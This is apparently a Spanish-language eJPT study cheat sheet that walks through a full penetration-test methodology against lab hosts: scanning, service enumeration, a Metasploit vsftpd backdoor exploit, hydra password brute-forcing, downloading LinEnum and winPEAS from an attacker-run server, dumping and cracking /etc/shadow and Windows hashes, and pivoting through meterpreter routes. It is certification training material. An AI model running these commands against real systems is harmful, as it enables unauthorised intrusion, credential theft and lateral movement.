Conoce tu posición dentro de la red
Identifica tu configuración de red y las redes que puedes alcanzar antes de comenzar el escaneo.
ip -br addr
ip route
Identifica hosts, puertos, servicios y sistema operativo
Identifica los sistemas activos y la superficie expuesta antes de comenzar la enumeración.
nmap -sn 10.10.10.0/24
-Pn para escanear objetivos que podrían bloquear el ping.nmap -Pn 10.10.10.0/24
nmap -sS 10.10.10.20
nmap -sS -p- 10.10.10.20
nmap -sU --top-ports 100 10.10.10.20
nmap -sV -p 21,22,80,445 10.10.10.20
nmap -sU -sV -p 53,161 10.10.10.20
nmap -O 10.10.10.20
Profundiza en cada servicio expuesto
Obtén información que revele usuarios, archivos, configuraciones, credenciales o posibles vectores de entrada.
ftp 10.10.10.20
nmap -sV -p 22 10.10.10.20
smtp-user-enum -M VRFY -U usuarios.txt -t 10.10.10.20
snmpwalk -v2c -c public 10.10.10.20
smbclient -L //10.10.10.20/ -N
enum4linux -a 10.10.10.20
nxc winrm 10.10.10.20 -u usuario -p password
nxc rdp 10.10.10.20 -u usuario -p password
whatweb http://10.10.10.20
curl http://10.10.10.20/robots.txt
gobuster dir -u http://10.10.10.20 -w /usr/share/wordlists/dirb/common.txt
curl -X OPTIONS http://10.10.10.20
davtest -url http://10.10.10.20/
wpscan --url http://10.10.10.20 -e u
wpscan --url http://10.10.10.20 -e p
droopescan scan drupal -u http://10.10.10.20
Convierte los hallazgos en rutas de acceso
En esta fase convertimos los hallazgos de enumeración en rutas de acceso antes de comenzar la explotación.
searchsploit vsftpd 2.3.4
Exploits asociados a otras versiones o condiciones
Seleccionado: coincide con vsftpd 2.3.4 y permite explotación remota.
msf6 > search vsftpd
exploit/unix/ftp/vsftpd_234_backdoor
admin · deploy · backup
SSH · FTP · SMB · WinRM · RDP · MySQL · Web
unix_passwords.txt
rockyou.txt
mysql -h 10.10.10.20 -u usuario -p
Ejecuta los vectores de acceso seleccionados
En esta fase ejecutamos los vectores seleccionados para obtener acceso al objetivo.
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.10.10.20
run
hydra -L usuarios.txt -P rockyou.txt ssh://10.10.10.20
hydra -L usuarios.txt -P rockyou.txt ftp://10.10.10.20
hydra -L usuarios.txt -P rockyou.txt smb://10.10.10.20
ssh usuario@10.10.10.20
evil-winrm -i 10.10.10.20 -u usuario -p password
xfreerdp /u:usuario /p:password /v:10.10.10.20
cadaver http://10.10.10.20/
impacket-psexec usuario:password@10.10.10.20
Escala privilegios y obtén credenciales
Enumera el sistema comprometido para escalar privilegios, obtener credenciales y ampliar tu acceso.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
id
uname -a
hostname
python3 -m http.server 8000
wget http://10.10.10.10:8000/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
sudo -l
find / -perm -4000 -type f 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab
meterpreter > shell
cat /etc/shadow > hashes.txt
john --wordlist=rockyou.txt hashes.txt
ssh usuario@10.10.10.50
whoami
whoami /priv
systeminfo
certutil -urlcache -f http://10.10.10.10:8000/winPEAS.exe winPEAS.exe
winPEAS.exe
whoami /priv
sc query
schtasks /query
meterpreter > hashdump
hashcat -m 1000 hashes.txt rockyou.txt
evil-winrm -i 10.10.10.50 -u usuario -p password
Utiliza el host comprometido para alcanzar nuevas redes
Identifica redes adicionales y utiliza el sistema comprometido como punto de acceso hacia objetivos internos.
ip -br addr
ip route
ipconfig
route print
meterpreter > run autoroute -s 10.10.20.0/24
msf6 > route print
use auxiliary/scanner/portscan/tcp
use auxiliary/server/socks_proxy
proxychains nmap -sT -Pn 10.10.20.50
Ya tienes una metodología clara para avanzar en cada fase
Usa esta guía como referencia durante tus prácticas para saber qué hacer, qué buscar y cómo avanzar durante tu preparación para el eJPT.
Ahora ponlo en práctica
Aplica esta metodología resolviendo una máquina vulnerable diseñada para practicar escenarios tipo eJPT.
Respaldado por: